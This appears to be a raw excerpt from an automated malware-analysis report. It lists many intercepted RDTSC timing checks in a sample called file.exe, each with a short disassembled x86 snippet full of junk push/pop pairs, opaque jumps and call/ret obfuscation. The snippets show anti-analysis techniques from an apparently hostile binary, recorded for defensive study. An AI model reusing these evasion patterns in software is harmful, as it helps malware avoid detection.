Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B466 second address: 114B4CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F626D6E9A79h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jns 00007F626D6E9A87h 0x00000015 pushad 0x00000016 jmp 00007F626D6E9A79h 0x0000001b jp 00007F626D6E9A66h 0x00000021 popad 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F626D6E9A74h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B4CC second address: 114B4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B6AE second address: 114B6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 114B6BB second address: 114B6BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131006 second address: 113101D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F626D6E9A6Bh 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113101D second address: 1131021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131021 second address: 1131039 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007F626D6E9A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F626D6E9A72h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131039 second address: 113103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 113103F second address: 1131043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1131043 second address: 113104D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A70F second address: 116A72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F626D6E9A77h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A72C second address: 116A74E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F626C9C9A36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A74E second address: 116A756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A756 second address: 116A762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F626C9C9A26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116A762 second address: 116A76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AA51 second address: 116AA55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AA55 second address: 116AA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AA5B second address: 116AA65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F626C9C9A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AA65 second address: 116AA69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AD1B second address: 116AD1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AD1F second address: 116AD25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AD25 second address: 116AD4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F626C9C9A2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AD4B second address: 116AD73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F626D6E9A73h 0x0000000b pushad 0x0000000c jmp 00007F626D6E9A6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AED6 second address: 116AEF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F626C9C9A2Fh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d js 00007F626C9C9A26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AEF3 second address: 116AEF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116AEF9 second address: 116AF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c je 00007F626C9C9A26h 0x00000012 popad 0x00000013 push edx 0x00000014 js 00007F626C9C9A26h 0x0000001a pop edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116B4AC second address: 116B4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F626D6E9A66h 0x0000000f jmp 00007F626D6E9A72h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116194A second address: 1161982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626C9C9A34h 0x00000009 popad 0x0000000a jmp 00007F626C9C9A36h 0x0000000f pushad 0x00000010 jl 00007F626C9C9A26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BE8C second address: 116BE92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BE92 second address: 116BEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F626C9C9A2Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BEA8 second address: 116BECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F626D6E9A66h 0x0000000a jc 00007F626D6E9A66h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F626D6E9A66h 0x0000001a pushad 0x0000001b popad 0x0000001c jc 00007F626D6E9A66h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C17D second address: 116C196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626C9C9A34h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C2EF second address: 116C33B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F626D6E9A72h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F626D6E9A8Ah 0x00000011 jmp 00007F626D6E9A76h 0x00000016 jmp 00007F626D6E9A6Eh 0x0000001b push ecx 0x0000001c push edi 0x0000001d pop edi 0x0000001e pop ecx 0x0000001f popad 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 pop edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1170C5A second address: 1170C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1178394 second address: 11783AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11783AB second address: 11783B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11786A9 second address: 11786AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11789B4 second address: 11789CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F626C9C9A2Dh 0x00000009 js 00007F626C9C9A26h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179413 second address: 1179419 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179A51 second address: 1179A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179E9E second address: 1179EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179F29 second address: 1179F30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179F30 second address: 1179F57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F626D6E9A66h 0x00000009 jng 00007F626D6E9A66h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F626D6E9A72h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1179F57 second address: 1179F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov dword ptr [ebp+122D1ADEh], ebx 0x00000010 nop 0x00000011 pushad 0x00000012 push esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A1F9 second address: 117A203 instructions: 0x00000000 rdtsc 0x00000002 je 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A3B6 second address: 117A3C4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F626C9C9A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A3C4 second address: 117A3C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A4CA second address: 117A4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A54A second address: 117A54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A54E second address: 117A58C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626C9C9A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F626C9C9A28h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F626C9C9A28h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 add dword ptr [ebp+122D26EDh], ecx 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117A58C second address: 117A591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117AA1A second address: 117AA1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B3B3 second address: 117B3B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B3B9 second address: 117B3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D06E second address: 117D072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D072 second address: 117D0D4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F626C9C9A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push ecx 0x0000000d jmp 00007F626C9C9A2Dh 0x00000012 pop ecx 0x00000013 nop 0x00000014 mov esi, dword ptr [ebp+122D3784h] 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F626C9C9A28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 push 00000000h 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F626C9C9A38h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117D0D4 second address: 117D0FA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F626D6E9A68h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F626D6E9A73h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117DBD3 second address: 117DC21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F626C9C9A2Ah 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F626C9C9A28h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d movzx esi, si 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1B8Bh], ebx 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117DC21 second address: 117DC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117F0EF second address: 117F157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edi, 547F3D7Dh 0x00000011 mov dword ptr [ebp+122D1B28h], edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F626C9C9A28h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 mov si, 3BA3h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F626C9C9A28h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push ecx 0x00000059 jnl 00007F626C9C9A26h 0x0000005f pop ecx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117FC06 second address: 117FC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F626D6E9A66h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181A46 second address: 1181A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1181A4A second address: 1181A58 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11805D6 second address: 11805DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185234 second address: 1185238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185238 second address: 118523E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185772 second address: 1185776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1185776 second address: 118577A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1186805 second address: 1186809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1186809 second address: 1186813 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11858D1 second address: 118597F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F626D6E9A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F626D6E9A6Eh 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F626D6E9A68h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+122D22C1h], esi 0x00000041 mov eax, dword ptr [ebp+122D0A39h] 0x00000047 push 00000000h 0x00000049 push edx 0x0000004a call 00007F626D6E9A68h 0x0000004f pop edx 0x00000050 mov dword ptr [esp+04h], edx 0x00000054 add dword ptr [esp+04h], 00000015h 0x0000005c inc edx 0x0000005d push edx 0x0000005e ret 0x0000005f pop edx 0x00000060 ret 0x00000061 jmp 00007F626D6E9A71h 0x00000066 push FFFFFFFFh 0x00000068 mov edi, 115DB19Dh 0x0000006d nop 0x0000006e jbe 00007F626D6E9A70h 0x00000074 jmp 00007F626D6E9A6Ah 0x00000079 push eax 0x0000007a pushad 0x0000007b jmp 00007F626D6E9A6Ch 0x00000080 pushad 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1186954 second address: 118697E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626C9C9A37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F626C9C9A2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11896B4 second address: 11896BE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F626D6E9A6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118975D second address: 1189763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1189763 second address: 1189768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1188A82 second address: 1188A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A667 second address: 118A678 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A678 second address: 118A67C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A67C second address: 118A693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F626D6E9A6Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A693 second address: 118A697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A87C second address: 118A882 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118C6F5 second address: 118C700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F626C9C9A26h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118B92F second address: 118B943 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F626D6E9A70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118B943 second address: 118B966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F626C9C9A37h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118C8DE second address: 118C8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
